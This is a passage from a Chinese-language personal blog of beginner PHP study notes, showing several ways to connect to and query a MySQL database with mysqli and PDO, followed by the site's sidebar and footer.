         &quot;&amp;lt;td&amp;gt;{$row[&apos;submission_date&apos;]} &amp;lt;/td&amp;gt; &quot;.
         &quot;&amp;lt;/tr&amp;gt;&quot;;
}
echo &apos;&amp;lt;/table&amp;gt;&apos;;
mysqli_close($conn);
?&amp;gt;


或者写成m面向对象：
        &amp;lt;?php
header(&quot;content-type:text/html;charset=utf-8&quot;); 
$mysql_conf=array(&apos;host&apos;=&amp;gt;&apos;127.0.0.1&apos;,&apos;username&apos;=&amp;gt;&apos;root&apos;,&apos;password&apos;=&amp;gt;&apos;root&apos;,&apos;database&apos;=&amp;gt;&apos;test&apos;,);//定义的数组 =&amp;gt;
$mysqli=new mysqli($mysql_conf[&apos;host&apos;],$mysql_conf[&apos;username&apos;],$mysql_conf[&apos;password&apos;]);//连接数据库
//new 对象，实例化
if ($mysqli-&amp;gt;connect_error) {
    die(&quot;not connect to database server&quot;.$mysqli-&amp;gt;connect_error);//connect_error该变量存储连接服务时的错误信息，若没有，则说明连接成功
}
$mysqli-&amp;gt;query(&quot;set names &apos;utf8&apos;&quot;);//设置编码方式
$db=$mysqli-&amp;gt;select_db($mysql_conf[&apos;database&apos;]);//选择数据库

if (!$db) {
    die(&apos;not connect to the db&apos;.$mysqli-&amp;gt;error);//error变量存储连接数据库的错误信息，
}

$sql=&quot;select * from news where tid=1&quot;; //这是要执行的sql语句

$conn=$mysqli-&amp;gt;query($sql);//执行sql语句
//var_dump($conn);
if (!$conn) {
    die(&apos;sql is error&apos;.$mysqli-&amp;gt;error);
}

while ($row=$conn-&amp;gt;fetch_array(MYSQLI_ASSOC)) {//fetch_assoc该方法将执行完sql语句的结果转换为数组
    //var_dump($row);
    echo &quot;&amp;lt;pre&amp;gt;&quot;;
        //print_r($row);
        echo $row[&apos;content&apos;];
        echo &quot;&amp;lt;/pre&amp;gt;&quot;;
}

$conn-&amp;gt;free();//释放执行sql语句的资源
$mysqli-&amp;gt;close();//释放连接数据库服务的资源


// mysqli_fetch_assoc(), 该函数从结果集中取得一行作为关联数组 ,返回根据从结果集取得的行生成的关联数组，如果没有更多行，则返回 false。
// mysqli_fetch_array() 函数从结果集中取得一行作为关联数组，或数字数组，或二者兼有 返回根据从结果集取得的行生成的数组，如果没有更多行则返回 false。




执行数据库语句（成功返回0，失败返回1）
$result=mysqli_query($conn,$create_db_sql);

方法2：使用mysql扩展（php低于5.5）

方法3：使用PDO技术（面向对象的，防止sql注入）接下一篇：
</code></pre><hr>
<h2 id="周五"><a href="#周五" class="headerlink" title="周五"></a>周五</h2><p>方法3：使用PDO技术（面向对象的，防止sql注入）</p>
<pre><code>$mysql_conf=array(
&apos;host&apos;=&amp;gt;&apos;127.0.0.1:3306&apos;,
&apos;db&apos;=&amp;gt;&apos;test&apos;,
&apos;db_user&apos;=&amp;gt;&apos;root&apos;,
&apos;db_pwd&apos;=&amp;gt;&apos;123456&apos;,
);
//$pdo = new PDO(&quot;mysql:host=&quot;.$mysql_conf[&apos;host&apos;].&quot;;dbname=&quot;.$mysql_conf[&apos;db&apos;],&quot;db_user=&quot;.$mysql_conf[&apos;db_user&apos;],&quot;db_pwd=&quot;.$mysql_conf[&apos;db_pwd&apos;]);

$pdo = new PDO(&quot;mysql:host=&quot; . $mysql_conf[&apos;host&apos;] . &quot;;dbname=&quot; . $mysql_conf[&apos;db&apos;], $mysql_conf[&apos;db_user&apos;], $mysql_conf[&apos;db_pwd&apos;]);//$dsn = &quot;mysql:dbname=test;host=127.0.0.1&quot;;

$pdo-&amp;gt;exec(&quot;set names &apos;utf8&apos;&quot;);
$sql=&quot;select * from food where id=3&quot;;
$stmt=$pdo-&amp;gt;prepare($sql);
$stmt-&amp;gt;bindValue(1,&apos;1&apos;,PDO::PARAM_STR);
$rs=$stmt-&amp;gt;execute();
if ($rs){
    while ($row=$stmt-&amp;gt;fetch(PDO::FETCH_ASSOC)){
        var_dump($row);
    }
}
$pdo=null;
?&amp;gt;
</code></pre>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/PHP/" rel="tag"># PHP</a>
          
            <a href="/tags/Mysql/" rel="tag"># Mysql</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/12/16/php简陋实现wordpress安装流程/" rel="next" title="php简陋实现wordpress安装流程">
                <i class="fa fa-chevron-left"></i> php简陋实现wordpress安装流程
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目錄
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            本站概覽
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Jaychouzzk</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">文章</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">標籤</span>
                
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#第四周"><span class="nav-number">1.</span> <span class="nav-text">第四周</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#周一"><span class="nav-number">2.</span> <span class="nav-text">周一</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#周二"><span class="nav-number">3.</span> <span class="nav-text">周二</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#生成cookie"><span class="nav-number">4.</span> <span class="nav-text">生成cookie</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#setcookie-‘id’-tmp-time-50"><span class="nav-number">5.</span> <span class="nav-text">setcookie(‘id’, $tmp, time()+50);</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#校验cookie"><span class="nav-number">6.</span> <span class="nav-text">校验cookie</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#lt-meta-http-equiv-refresh-content-0-URL-’show-php’-gt"><span class="nav-number">7.</span> <span class="nav-text">&lt;meta http-equiv=refresh content=0;URL=’show.php’&gt;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#上传文件："><span class="nav-number">8.</span> <span class="nav-text">上传文件：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#lt-form-gt"><span class="nav-number">9.</span> <span class="nav-text">&lt;/form&gt;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ubuntu16-mysql"><span class="nav-number">10.</span> <span class="nav-text">ubuntu16  mysql </span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#周四"><span class="nav-number">11.</span> <span class="nav-text">周四</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#周五"><span class="nav-number">12.</span> <span class="nav-text">周五</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Jaychouzzk</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 強力驅動</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主題 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
